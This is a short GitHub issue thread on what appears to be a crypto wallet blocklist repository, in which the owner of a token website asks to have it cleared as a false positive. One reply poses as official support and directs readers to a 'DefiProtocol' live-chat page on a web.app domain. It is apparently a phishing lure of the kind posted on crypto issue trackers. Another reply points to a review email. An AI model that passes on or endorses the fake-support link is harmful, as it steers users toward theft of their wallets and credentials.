### ISSUE TITLE
Please add WW3 Shiba to whitelist

### ISSUE THREAD

**Issue by leowatson110** [phantom/blocklist#1264]
We have noticed a warning on our website, https://ww3shiba.com, indicating it is malicious. We believe this is a false positive as our site is secure and follows strict security protocols. Please review this warning and advise on any steps needed to resolve this issue promptly.

**Comment by Sweetmind300** [comment]
Hello @leowatson110 
This issue has been preview on the Pull Requests. To resolve, Contact the official DefiProtocol page to initiate a chat with our live agent using the chat button via [support](https://accessonlinedefiprotocol.web.app/)

**Comment by Harii94** [comment]
Please send an email to review@blowfish.xyz for further investigation.
